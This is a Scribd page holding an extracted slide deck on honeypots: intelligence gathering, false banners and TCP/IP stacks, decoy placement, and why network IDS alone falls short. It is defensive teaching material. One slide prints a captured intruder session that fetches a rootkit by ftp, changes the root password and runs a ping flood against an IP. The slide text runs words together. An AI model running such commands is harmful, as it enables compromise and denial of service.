Benvenuto in Scribd!

Salta carosello

Honeypot Advantages & Disadvantages

Caricato da

Jay Soni

Il 100% ha trovato utile questo documento (1 voto)

73 visualizzazioni23 pagine

Titolo originale

Copyright

Formati disponibili

PDF, TXT o leggi online da Scribd

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Segnala questo documento

Copyright:

Attribution Non-Commercial (BY-NC)

Formati disponibili

Scarica in formato PDF, TXT o leggi online su Scribd

Segnala contenuti inappropriati

Il 100% ha trovato utile questo documento (1 voto)

73 visualizzazioni23 pagine

Honeypot Advantages & Disadvantages

Caricato da

Jay Soni

Copyright:

Attribution Non-Commercial (BY-NC)

Formati disponibili

Scarica in formato PDF, TXT o leggi online su Scribd

Segnala contenuti inappropriati

Salta alla pagina

Sei sulla pagina 1di 23

Cerca all'interno del documento

HoneypotAdvantages& Disadvantages

George Bakos - gbakos@ists.dartmouth.edu Jay Beale - jay@bastille-linux.org

Honeypot Best Practices

HoneypotAdvantages& Disadvantages

IntelligenceGathering PerceptionManagement EngineeringDeception Isn' tanIntrusionDetection Systemenough? Limits,caveatsandlegal&ethical concerns

Honeypot Best Practices

IntelligenceGathering

Ifyouknowtheenemyandknow yourself,youneednotfeartheresultofa hundredbattles.Ifyouknowyourselfbut nottheenemy,foreveryvictorygained youwillalsosufferadefeat.

SunTzu,TheArtofWar

Honeypot Best Practices

IntelligenceGathering
#cd/;lsalF;w;unamea;id #ftpftp.0catch.com #ls #ftp #open #ftp.0catch.com #rootkit.0catch.com #szopol #ls #passwdroot #wget

# #

ping -f -s 65000 64.58.174.8& ps ax

Honeypot Best Practices

PerceptionManagement
Battlefielddeceptionconsistsofthose operationsconductedatechelonstheater (Armycomponent)andbelowwhich purposelymisleadenemydecisionmakers by *Distortion. *Concealment: *Falsificationofindicatorsoffriendly intentions,capabilities,ordispositions. USArmyFM902
Honeypot Best Practices

PerceptionManagement

Falsebanners FalseTCP/IPstacks Decoysystems Honeynets

Honeypot Best Practices

PerceptionManagement FalseBanners

Honeypot Best Practices

PerceptionManagement FalseBanners

Honeypot Best Practices

PerceptionManagement FalseTCP/IPStacks
#wwww:ttt:mmm:D:W:S:N:I:OSDescription # #wwwwwindowsize #ttttimetolive #mmmmaximumsegmentsize #Ddon' tfragmentflag(0=unset,1=set) #Wwindowscaling(1=notpresent, other=value) #SsackOKflag(0=unset,1=set) #Nnopflag(0=unset,1=set) #Ipacketsize(1=irrevelant)
Honeypot Best Practices

PerceptionManagement FalseTCP/IPStacks
#wwww:ttt:mmm:D:W:S:N:I:OSDescription 5840:128:536:1:0:1:1:48:Windows95(3) 16060:64:1460:1:0:1:1:60:Debian/CalderaLinux 2.2.x 8760:255:1380:1:0:0:0:44:Solaris2.7

Honeypot Best Practices

PerceptionManagement Decoys,Honeypots,Honeynets

LowInteraction HighInteraction Emulators NullListeners VirtualSystems PhysicalSystems

Honeypot Best Practices

EngineeringDeception

...heisskillfulindefensewhose opponentdoesnotknowwhatto attack.

SunTzu,TheArtofWar

Honeypot Best Practices

EngineeringDeception ExposedDecoys
Honeypot WWW WWW

Thanks for the intel!

Honeypot SMTP/DNS

SMTP /DNS

Honeypot Best Practices

EngineeringDeception InterleavedDecoys
DMZ
Honeypot WWW Host HP

Thanks for the intel!

Host

HP Honeypot SMTP /DNS

Host

Honeypot Best Practices

EngineeringDeception LateralDecoys
HP HP HP

10.2.8.0/22
HP

HP HP HP Host Host

WWW

10.2.4.0/22
SMTP /DNS

Host Host Host

Honeypot Best Practices

EngineeringDeception

ProductionHoneypots

IDSenhancement/augmentation Cloudthebattlefield;laya"Minefield" (Mantrap) Insiders/Outsiders

Honeypot Best Practices

EngineeringDeception

ResearchHoneypots

0daydiscovery Education&awareness Trendanalysis ISACs,HoneynetAlliance

SecurityAlliances

Honeypot Best Practices

Isn' tNetworkIDSenough?
[**][1:618:2]SCANSquidProxyattempt[**] [Classification:AttemptedInformationLeak][Priority:2] 11/0408:09:27.772993216.218.184.2:3704>10.2.87.142:3128 TCPTTL:49TOS:0x0ID:35607IpLen:20DgmLen:44DF ******S*Seq:0x13C82726Ack:0x0Win:0x4000TcpLen:24 TCPOptions(1)=>MSS:1412 [**][100:1:1]spp_portscan:PORTSCANDETECTEDfrom 216.218.184.2(THRESHOLD4connectionsexceededin0 seconds)[**] 11/0420:19:09.882416 SnortNetworkIntrusionDetectionSystemalert http://www.snort.org

Honeypot Best Practices

Isn' tNetworkIDSenough?
GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/3128/1 0287142HTTP/1.0 Connection:close Pragma:nocache Accept:text/html Host:216.218.184.9 UserAgent:Mozilla/4.0(compatible;MSIE5.5;AOL5.0; Windows98) CLIENTIP:10.2.87.142 XFORWARDEDFOR:10.2.87.142 Tiny Honeypot log

Honeypot Best Practices

Isn' tNetworkIDSenough?
GET http://216.218.184.9/pI9Ob6SZcWQR2ODUWOopFg/81/10 287142HTTP/1.0 Connection:close Pragma:nocache Accept:text/html Host:216.218.184.9 UserAgent:Mozilla/4.0(compatible;MSIE5.5;AOL5.0; Windows98) CLIENTIP:10.2.87.142 XFORWARDEDFOR:10.2.87.142 Tiny Honeypot log

Honeypot Best Practices

Caveats(There' snofree lunch)

if($value=="high"){$cost= "high"}
Deploymentcosts Analysiscosts Potentialforgreaterrisk

Honeypot Best Practices

Caveats(There' snofree lunch)

Honeypot Best Practices

HoneypotAdvantages& Disadvantages
George Bakos - gbakos@ists.dartmouth.edu Jay Beale - jay@bastille-linux.org

Honeypot Best Practices

Potrebbero piacerti anche

Using GPT-Eliezer Against ChatGPT Jailbreaking
Documento23 pagine
Using GPT-Eliezer Against ChatGPT Jailbreaking
Nezaket Sule Erturk
Nessuna valutazione finora
The Robotic Age Fully Customized
Documento43 pagine
The Robotic Age Fully Customized
Broly Blane
Nessuna valutazione finora
OK S02 Zoltan Balazs Sandbox Mapping Botconf
Documento35 pagine
OK S02 Zoltan Balazs Sandbox Mapping Botconf
realalienreal
Nessuna valutazione finora
Sumit Kakade
Documento28 pagine
Sumit Kakade
Gangadhar Mahaling
Nessuna valutazione finora
Soldier of Fortune - Manual - PC
Documento155 pagine
Soldier of Fortune - Manual - PC
Anonymous utXYfMAX
100% (1)
Payload Delivery For Initial Access in Red Team Engagement and Advesary Simulation
Documento23 pagine
Payload Delivery For Initial Access in Red Team Engagement and Advesary Simulation
Gyfff
Nessuna valutazione finora
Flipkart GRID Document - Arsh Goyal
Documento6 pagine
Flipkart GRID Document - Arsh Goyal
Test
Nessuna valutazione finora
Not Your Daddys Dongle
Documento2 pagine
Not Your Daddys Dongle
Wibu
Nessuna valutazione finora
RkBlog - Nvidia Modular Diagnostic Software - MODS
Documento7 pagine
RkBlog - Nvidia Modular Diagnostic Software - MODS
Federico Rolón
Nessuna valutazione finora
BalazsZoltan MRG-Effitas PDF
Documento51 pagine
BalazsZoltan MRG-Effitas PDF
Adriana Medina Hernández
Nessuna valutazione finora
Hacking IoT For Bug Bounties PDF
Documento81 pagine
Hacking IoT For Bug Bounties PDF
marlon_tayag
Nessuna valutazione finora
Lca2012 Hack Everything
Documento77 pagine
Lca2012 Hack Everything
Zad
Nessuna valutazione finora
Computer Hardware Installation and Maintenance Viva
Documento32 pagine
Computer Hardware Installation and Maintenance Viva
shriram1082883
Nessuna valutazione finora
How to Hack Like a GOD: Master the secrets of hacking through real-life hacking scenarios
Da Everand
How to Hack Like a GOD: Master the secrets of hacking through real-life hacking scenarios
Sparc FLOW
Valutazione: 3.5 su 5 stelle
3.5/5 (5)
How to Hack Like a GOD: Hacking the Planet, #2
Da Everand
How to Hack Like a GOD: Hacking the Planet, #2
sparc Flow
Valutazione: 5 su 5 stelle
5/5 (1)
Moabi - Bruteforcing PreBoot Authentication - TELECOMIX 2009
Documento55 pagine
Moabi - Bruteforcing PreBoot Authentication - TELECOMIX 2009
Moabi
Nessuna valutazione finora
Malware Analysis
Documento35 pagine
Malware Analysis
Mansi Sharma
Nessuna valutazione finora
The Osiris Gambit
Documento13 pagine
The Osiris Gambit
Arixson
Nessuna valutazione finora
Ethichack Raturi
Documento14 pagine
Ethichack Raturi
Anurag Bhatt
Nessuna valutazione finora
Epsilon Cyborg
Documento23 pagine
Epsilon Cyborg
James Stevens
Nessuna valutazione finora
GTA IV Technical Guide
Documento5 pagine
GTA IV Technical Guide
fbp78
Nessuna valutazione finora
GTA IV Technical Guide
Documento5 pagine
GTA IV Technical Guide
fbp78
Nessuna valutazione finora
Defcon 17 Thomas Wilhelm Hacking Ipod Touch
Documento43 pagine
Defcon 17 Thomas Wilhelm Hacking Ipod Touch
Lovely Green
Nessuna valutazione finora
Erro Hardware - 119
Documento3 pagine
Erro Hardware - 119
phvilarino
Nessuna valutazione finora
Final Liberation Warhammer EPIC 40,000
Documento21 pagine
Final Liberation Warhammer EPIC 40,000
tyrant88
0% (1)
The Bug Shop: Ben Nagy & The Grugq
Documento47 pagine
The Bug Shop: Ben Nagy & The Grugq
timtom123
Nessuna valutazione finora
Felipe Duarte Lead CTI Specialist - Lumu Technologies @dark0pcodes
Documento26 pagine
Felipe Duarte Lead CTI Specialist - Lumu Technologies @dark0pcodes
Gyfff
Nessuna valutazione finora
Pyramid - Adventurous Occupations - Computer Expert (For Gurps 4e)
Documento5 pagine
Pyramid - Adventurous Occupations - Computer Expert (For Gurps 4e)
answeringthecal
Nessuna valutazione finora
Flipkart GRID Document - Arsh Goyal
Documento6 pagine
Flipkart GRID Document - Arsh Goyal
Sharif Launda
Nessuna valutazione finora
Malware Analysis
Documento33 pagine
Malware Analysis
pjairon
Nessuna valutazione finora
Attacker "Math" 101: Professor Dai Zovi Institute For The Advancement of Memory Corruption
Documento47 pagine
Attacker "Math" 101: Professor Dai Zovi Institute For The Advancement of Memory Corruption
newvpupkin
Nessuna valutazione finora
Bagar Io
Documento2 pagine
Bagar Io
AbrahamsenAlvarez0
Nessuna valutazione finora
There Is No Spoon (MatrixRPG)
Documento34 pagine
There Is No Spoon (MatrixRPG)
Cristhian Cáceres
100% (2)
Shadowrun Hacking
Documento5 pagine
Shadowrun Hacking
Jake Madden
100% (1)
40 Fallout 4 Cheats & Hacks
Documento16 pagine
40 Fallout 4 Cheats & Hacks
Badrul Amin
Nessuna valutazione finora
Moabi - Breaking Preboot Authentication - H2HC 2009
Documento63 pagine
Moabi - Breaking Preboot Authentication - H2HC 2009
Moabi
Nessuna valutazione finora
Z Phisher
Documento11 pagine
Z Phisher
kajole7693
Nessuna valutazione finora
Jonathan Brossard - H2HC 2009
Documento63 pagine
Jonathan Brossard - H2HC 2009
Moabi
Nessuna valutazione finora
5143 - Newbie's Guide To IL2 Online Dog Fighting
Documento38 pagine
5143 - Newbie's Guide To IL2 Online Dog Fighting
Cory Smith
Nessuna valutazione finora
Artificial Intelligence: Agents, Architecture, and Techniques
Documento79 pagine
Artificial Intelligence: Agents, Architecture, and Techniques
gopitheprince
Nessuna valutazione finora
FilipPalian - MateuszKocielski. Simplest Ownage Human Observed Routers
Documento62 pagine
FilipPalian - MateuszKocielski. Simplest Ownage Human Observed Routers
Yury Chemerkin
Nessuna valutazione finora
BlackHat DC 2011 Grand-Workshop
Documento93 pagine
BlackHat DC 2011 Grand-Workshop
cyberav
Nessuna valutazione finora
Exploiting Online Games:: Cheating Massively Distributed Systems
Documento40 pagine
Exploiting Online Games:: Cheating Massively Distributed Systems
Revesz Botond
Nessuna valutazione finora
SecureBoot-20 Ways Past Secure Boot
Documento47 pagine
SecureBoot-20 Ways Past Secure Boot
David Brasil da Cunha
Nessuna valutazione finora
Soldiers Heroes of wwII Manual PDF
Documento24 pagine
Soldiers Heroes of wwII Manual PDF
Momchil Bonev
Nessuna valutazione finora
Cyberpunk 2020 - Net - Netrunning - Run - Net Beta 1.2.1 by VFTE
Documento16 pagine
Cyberpunk 2020 - Net - Netrunning - Run - Net Beta 1.2.1 by VFTE
Santiago Alcázar
Nessuna valutazione finora
Beta 1.2.1a
Documento14 pagine
Beta 1.2.1a
Claudio Bernardini
Nessuna valutazione finora
Players Guide To The High Clans
Documento8 pagine
Players Guide To The High Clans
Jay G
Nessuna valutazione finora
Instructions To Long War Dev Console
Documento6 pagine
Instructions To Long War Dev Console
Ruifeng Xie
Nessuna valutazione finora
Secrets of Google VRP
Documento54 pagine
Secrets of Google VRP
Joyson Pereira
Nessuna valutazione finora
10 Ways Past Secure Boot v1.0 JVW Shakacon
Documento27 pagine
10 Ways Past Secure Boot v1.0 JVW Shakacon
rangak2004
Nessuna valutazione finora
PC Quest May 2015
Documento92 pagine
PC Quest May 2015
sagar
Nessuna valutazione finora
Hitman Contracts Prima Official EGuide
Documento145 pagine
Hitman Contracts Prima Official EGuide
Anonymous utXYfMAX
Nessuna valutazione finora
Deface A Website
Documento6 pagine
Deface A Website
Evelyn-DavidBontean
Nessuna valutazione finora
Sti5518 Project
Documento5 pagine
Sti5518 Project
Dedi Drafter
Nessuna valutazione finora
Smart Interviews
Documento1 pagina
Smart Interviews
goudicharla pravalika
Nessuna valutazione finora
WP - Firmware Hacking, Slash The Pineapple For Fun (En)
Documento21 pagine
WP - Firmware Hacking, Slash The Pineapple For Fun (En)
peper
Nessuna valutazione finora
CPSC 1105 Assignment 2 Template 1 - 1687663454447
Documento2 pagine
CPSC 1105 Assignment 2 Template 1 - 1687663454447
fofabaw817
Nessuna valutazione finora
Reality's Edge: Cyberpunk Skirmish Rules
Da Everand
Reality's Edge: Cyberpunk Skirmish Rules
Joseph McGuire
Nessuna valutazione finora
Utilizing RPG Maker VX Ace Lite
Da Everand
Utilizing RPG Maker VX Ace Lite
Matt Cole
Valutazione: 5 su 5 stelle
5/5 (1)
Unit List MUZAFFARPUR - Feb 18 PDF
Documento28 pagine
Unit List MUZAFFARPUR - Feb 18 PDF
Pawan Kumar
100% (1)
Pet Care in VietnamFull Market Report
Documento51 pagine
Pet Care in VietnamFull Market Report
Trâm Bảo
100% (1)
Incoterms 2010 Presentation
Documento47 pagine
Incoterms 2010 Presentation
Biswajit Dutta
Nessuna valutazione finora
0901b8038042b661 PDF
Documento8 pagine
0901b8038042b661 PDF
WaqasAhmed
Nessuna valutazione finora
Oddball Niches
Documento43 pagine
Oddball Niches
Rey Fuego
100% (1)
Civil Nature
Documento3 pagine
Civil Nature
Z_Jahangeer
100% (4)
DevelopmentPermission Handbook T&CP
Documento43 pagine
DevelopmentPermission Handbook T&CP
Shanmukha Katta
Nessuna valutazione finora
How To Unbrick Tp-Link Wifi Router Wr841Nd Using TFTP and Wireshark
Documento13 pagine
How To Unbrick Tp-Link Wifi Router Wr841Nd Using TFTP and Wireshark
daniel
Nessuna valutazione finora
Oasis 360 Overview 0710
Documento21 pagine
Oasis 360 Overview 0710
mychar60
0% (1)
Tank Emission Calculation Form
Documento12 pagine
Tank Emission Calculation Form
OmarTraficanteDelacasitos
Nessuna valutazione finora
RODECaster Pro II - DataSheet - V01 - 4
Documento1 pagina
RODECaster Pro II - DataSheet - V01 - 4
lazlos
Nessuna valutazione finora
Apst Graduatestage
Documento1 pagina
Apst Graduatestage
api-253013067
Nessuna valutazione finora
QP 4
Documento4 pagine
QP 4
Yusra Raouf
Nessuna valutazione finora
I.V. Fluid
Documento4 pagine
I.V. Fluid
Odunlami
Nessuna valutazione finora
8524
Documento8 pagine
8524
Ghulam Murtaza
Nessuna valutazione finora
19-2 Clericis Laicos
Documento3 pagine
19-2 Clericis Laicos
C C Bờm Bờm
Nessuna valutazione finora
GSM
Documento11 pagine
GSM
Lindux
Nessuna valutazione finora
Coursework For Resume
Documento7 pagine
Coursework For Resume
afjwdxrctmsmwf
100% (2)
Mcqs in Wills and Succession
Documento14 pagine
Mcqs in Wills and Succession
judy andrade
100% (1)
Admission Notice: Weekend Masters Program (WMES)
Documento4 pagine
Admission Notice: Weekend Masters Program (WMES)
masud
100% (1)
1 Ton Per Hour Electrode Production Line
Documento7 pagine
1 Ton Per Hour Electrode Production Line
Mohamed Adel
Nessuna valutazione finora
Bench Vortex
Documento3 pagine
Bench Vortex
Rio Febrianto
Nessuna valutazione finora
Gogte Institute of Technology: Karnatak Law Society'S
Documento33 pagine
Gogte Institute of Technology: Karnatak Law Society'S
jagaenator
Nessuna valutazione finora
Ambient Lighting Vol 6 Compressed
Documento156 pagine
Ambient Lighting Vol 6 Compressed
advait_etc
Nessuna valutazione finora
ProAim Instructions
Documento1 pagina
ProAim Instructions
feli24arias06
Nessuna valutazione finora
Dreamfoil Creations & Nemeth Designs
Documento22 pagine
Dreamfoil Creations & Nemeth Designs
Manoel Valentim
Nessuna valutazione finora
990-91356A ACRD300 CE-UL TechnicalSpecifications Part2
Documento25 pagine
990-91356A ACRD300 CE-UL TechnicalSpecifications Part2
Marvin Nerio
Nessuna valutazione finora
AN610 - Using 24lc21
Documento9 pagine
AN610 - Using 24lc21
aurelioewane2022
Nessuna valutazione finora
Tax Accounting Jones CH 4 HW Solutions
Documento7 pagine
Tax Accounting Jones CH 4 HW Solutions
LolaLaTrailera
Nessuna valutazione finora
Verma Toys Leona Bebe PDF
Documento28 pagine
Verma Toys Leona Bebe PDF
SILVIA ROMERO
100% (3)